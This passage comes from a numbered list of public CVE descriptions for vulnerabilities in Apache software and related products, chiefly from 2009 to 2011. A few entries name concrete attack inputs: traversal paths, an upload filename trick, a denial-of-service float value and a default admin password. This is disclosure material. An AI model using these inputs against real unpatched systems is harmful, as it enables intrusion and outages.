13970| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
13971| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
13972| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
13973| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
13974| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
13975| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
13976| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
13977| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
13978| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
13979| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
13980| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13981| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
13982| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
13983| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
13984| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
13985| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
13986| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
13987| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
13988| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
13989| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
13990| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
13991| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
13992| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
13993| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
13994| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
13995| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
13996| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13997| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
13998| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
13999| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
14000| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
14001| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
14002| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
14003| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
14004| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
14005| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
14006| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
14007| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
14008| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
14009| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
14010| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
14011| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
14012| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
14013| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
14014| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
14015| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
14016| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
14017| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
14018| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
14019| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
14020| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
14021| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
